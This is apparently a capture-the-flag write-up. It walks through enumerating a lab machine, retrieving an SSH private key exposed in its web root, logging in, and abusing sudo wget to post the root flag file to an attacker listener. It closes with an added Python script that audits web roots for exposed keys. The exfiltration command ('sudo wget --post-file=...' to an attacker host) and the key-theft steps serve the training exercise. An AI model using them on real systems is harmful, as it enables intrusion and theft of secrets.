Can you exfiltrate the root flag? Link to the room is here.
![](https://miro.medium.com/max/2560/1*7FHa3DPcIRdhd-fWlpFBOg.jpeg)
Our challenge here is to find 2 flags. Let’s start by enumerating the IP.
Use: nmap -sC -sV -A <machine_ip>
![](http://blog.ehackify.com/media/2021/06/Screenshot_10-2.png)
We can see that port 22 and port 80 are open.
Let’s go and check out what is on the website, since port 80 is open.
![](http://blog.ehackify.com/media/2021/06/Screenshot_12.png)
It’s a default page, but let’s view the source of this page. Most of the time in CTFs some information will be hidden in the source code.
![](http://blog.ehackify.com/media/2021/06/Screenshot_1-2.png)
Looks like we got a username; let’s remember it for later. Let’s do a directory enumeration on the website.
![](http://blog.ehackify.com/media/2021/06/1.png)
Let’s go to the /sitemap directory.
There is nothing interesting I could find there. Let’s enumerate this sitemap again.
Use: gobuster dir -u http://machine_IP/sitemap -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
![](http://blog.ehackify.com/media/2021/06/Screenshot_14.png)
We got something interesting here; let’s go and check out /.ssh.
![](http://blog.ehackify.com/media/2021/06/Screenshot_13.png)
Let’s download that id_rsa file.
Use: wget http://Machine_ip/sitemap/.ssh/id_rsa
![](http://blog.ehackify.com/media/2021/06/Screenshot_3.png)
Set the permissions on the file (ssh refuses keys that are readable by others).
Use: chmod 600 file_name
![](http://blog.ehackify.com/media/2021/06/Screenshot_4.png)
Let’s now use it to get an SSH connection to the machine.
Remember the username we got from the source code? It’s jessie.
Use: ssh -i id_rsa jessie@machine_IP
![](http://blog.ehackify.com/media/2021/06/Screenshot_5-1.png)
We are inside the machine now; move around and find the user flag.
![](http://blog.ehackify.com/media/2021/06/Screenshot_6-1.png)
Our next target is finding the root flag. Let’s try some old tricks to find out what sudo can do here.
![](http://blog.ehackify.com/media/2021/06/Screenshot_7.png)
So we know where our flag is, and we need to get it onto our machine. We have 2 options here: either we read it from the machine after a privilege escalation, or we copy it to our machine and then read it. Let’s take the shortest path and copy the file to our machine.
First, open a netcat listener on our base machine.
![](http://blog.ehackify.com/media/2021/06/Screenshot_8.png)
On the target machine, execute the command below (port is the port your netcat listener is bound to).
Use: sudo wget --post-file=/root/root_flag.txt http://attacker_machine_IP:port
![](http://blog.ehackify.com/media/2021/06/Screenshot_15-1.png)
The flag will be copied to the attacker’s machine; just cat that file to get the root flag.
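The foothold in this room came from a private key served out of the web root (/sitemap/.ssh/id_rsa). Below is an added defender-side check, not part of the original write-up, that walks a document root and reports files that are SSH keys by name, live in directories such as .ssh, or carry a private-key header even when renamed; the directory names, file names and sample tree are assumptions constructed for the demo.

```python
"""Audit a web document root for exposed private keys (added example)."""
import os
import re
import tempfile

# Any file beginning with one of these markers is a private key, whatever its name.
KEY_HEADER = re.compile(rb"-----BEGIN (?:OPENSSH|RSA|EC|DSA) PRIVATE KEY-----")
# File and directory names that should never sit under a document root (assumed list).
RISKY_NAMES = {"id_rsa", "id_ed25519", "id_ecdsa", "id_dsa", ".htpasswd"}
RISKY_DIRS = {".ssh", ".git"}


def scan_webroot(root):
    """Return sorted web-relative paths of files that look like private keys
    or that sit inside a directory that should not be web-accessible."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        parts = set() if rel_dir == "." else set(rel_dir.split(os.sep))
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = "/" + os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                head = fh.read(64)  # header check only needs the first bytes
            if name in RISKY_NAMES or parts & RISKY_DIRS or KEY_HEADER.match(head):
                findings.append(rel)
    return sorted(findings)


def build_demo_webroot():
    """Constructed sample tree mirroring the room: /sitemap/.ssh/id_rsa plus a
    renamed key. The key bodies are placeholders, not real key material."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "sitemap", ".ssh"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<!-- jessie -->\n")
    with open(os.path.join(root, "sitemap", ".ssh", "id_rsa"), "wb") as fh:
        fh.write(b"-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n-----END OPENSSH PRIVATE KEY-----\n")
    with open(os.path.join(root, "sitemap", "backup.txt"), "wb") as fh:
        fh.write(b"-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER\n-----END RSA PRIVATE KEY-----\n")
    return root


if __name__ == "__main__":
    for hit in scan_webroot(build_demo_webroot()):
        print("exposed:", hit)
```

Point scan_webroot at a real document root (for example /var/www/html) to run it outside the demo.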
![](http://blog.ehackify.com/media/2021/06/Screenshot_9.png)
Peace out ✌️, happy hacking.